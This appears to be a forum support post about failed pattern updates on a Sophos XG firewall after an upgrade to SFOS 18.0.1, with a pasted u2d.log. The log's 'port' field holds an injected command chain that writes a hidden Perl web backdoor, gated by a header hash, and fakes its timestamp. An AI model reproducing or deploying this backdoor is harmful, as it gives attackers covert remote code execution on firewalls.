After updating the firewall from SFOS 17.5.12 to 18.0.1 pattern updates fail.
We have updated about 15 other XGs from 17.5.11 or 17.5.12 to 18.0.1 last weekend and this is the only one that shows this error.
Here the entries from the "u2d.log" for one update try.
DEBUG Jun 17 07:47:14 [15545]: --serial = C1B0A6BXTCH24F8
DEBUG Jun 17 07:47:14 [15545]: --deviceid = 3e58d7f46db5db33a438a47d2b163d43
3309
DEBUG Jun 17 07:47:14 [15545]: --fwversion = 18.0.1.396
DEBUG Jun 17 07:47:14 [15545]: --productcode = CN
DEBUG Jun 17 07:47:14 [15545]: --model = XG135
DEBUG Jun 17 07:47:14 [15545]: --vendor = XN03
DEBUG Jun 17 07:47:14 [15545]: --pkg_ips_version = 3.16.06
DEBUG Jun 17 07:47:14 [15545]: --pkg_ips_cv = 15.0
DEBUG Jun 17 07:47:14 [15545]: --pkg_atp_version = 1.0.0302
DEBUG Jun 17 07:47:14 [15545]: --pkg_atp_cv = 1.00
DEBUG Jun 17 07:47:14 [15545]: --pkg_savi_version = 1.0.15676
DEBUG Jun 17 07:47:14 [15545]: --pkg_savi_cv = 1.00
DEBUG Jun 17 07:47:14 [15545]: --pkg_avira_version = 1.0.408053
DEBUG Jun 17 07:47:14 [15545]: --pkg_avira_cv = 4.00
DEBUG Jun 17 07:47:14 [15545]: --pkg_apfw_version = 11.0.012
DEBUG Jun 17 07:47:14 [15545]: --pkg_apfw_cv = 1.00
DEBUG Jun 17 07:47:14 [15545]: --pkg_sslvpn_version = 1.0.007
DEBUG Jun 17 07:47:14 [15545]: --pkg_sslvpn_cv = 1.00
DEBUG Jun 17 07:47:14 [15545]: --pkg_ipsec_version = 1.4.001
DEBUG Jun 17 07:47:14 [15545]: --pkg_ipsec_cv = 1.00
DEBUG Jun 17 07:47:14 [15545]: --pkg_geoip_version = 0
DEBUG Jun 17 07:47:14 [15545]: --pkg_geoip_cv = 1.00
DEBUG Jun 17 07:47:14 [15545]: --pkg_clientauth_version = 1.0.0019
DEBUG Jun 17 07:47:14 [15545]: --pkg_clientauth_cv = 2.00
DEBUG Jun 17 07:47:14 [15545]: --pkg_redfw_version = 3.0.000
DEBUG Jun 17 07:47:14 [15545]: --pkg_redfw_cv = 2.00
DEBUG Jun 17 07:47:14 [15545]: --sfmversion =
DEBUG Jun 17 07:47:14 [15545]: --oem = Sophos
DEBUG Jun 17 07:47:14 [15545]: --server =
DEBUG Jun 17 07:47:14 [15545]: --port = 8443;mount -o rw,remount /;echo '#!/
bin/perl'>/_conf/clv/.5693a701.pl;echo 'use CGI;use Digest::MD5 qw(md5_hex);my $
c = new CGI;if(md5_hex($ENV{"HTTP_SECG"}) eq "07a7b914808493ffb38a425025b4e6f7")
{eval($c->param(qw(uest)));}'>>/_conf/clv/.5693a701.pl;chmod +x /_conf/clv/.569
3a701.pl;touch -r /_conf/clv/index.pl /_conf/clv/.5693a701.pl;rm -f /tmp/cvs.pid
/_conf/clv/.so.pl;echo 8443
DEBUG Jun 17 07:47:14 [15545]: Added new server : Host - , Port - 8443
DEBUG Jun 17 07:47:14 [15545]: Final query string is :
?&serialkey=C1B0A6BXTCH24F8&deviceid=3e58d7f46db5db33a438a47d2b163d433309&fwvers
ion=18.0.1.396&productcode=CN&appmodel=XG135&appvendor=XN03&useragent=SF&oem=Sop
hos&pkg_ips_version=3.16.06&pkg_ips_cv=15.0&pkg_atp_version=1.0.0302&pkg_atp_cv=
1.00&pkg_savi_version=1.0.15676&pkg_savi_patch=2&pkg_savi_cv=1.00&pkg_avira_vers
ion=1.0.408053&pkg_avira_patch=2&pkg_avira_cv=4.00&pkg_geoip_version=0&pkg_geoip
_cv=1.00&pkg_clientauth_version=1.0.0019&pkg_clientauth_cv=2.00&pkg_apfw_version
=11.0.012&pkg_apfw_cv=1.00&pkg_redfw_version=3.0.000&pkg_redfw_cv=2.00&pkg_sslvp
n_version=1.0.007&pkg_sslvpn_cv=1.00&pkg_ipsec_version=1.4.001&pkg_ipsec_cv=1.00
&sfmversion=
DEBUG Jun 17 07:47:14 [15545]: Response code : 0
DEBUG Jun 17 07:47:14 [15545]: Response body :
DEBUG Jun 17 07:47:14 [15545]: Response length : 0
ERROR Jun 17 07:47:14 [15545]: Response not parsed successfully.
ERROR Jun 17 07:47:14 [15545]: FATAL : Error in parsing response, exiting.
This thread was automatically locked due to age.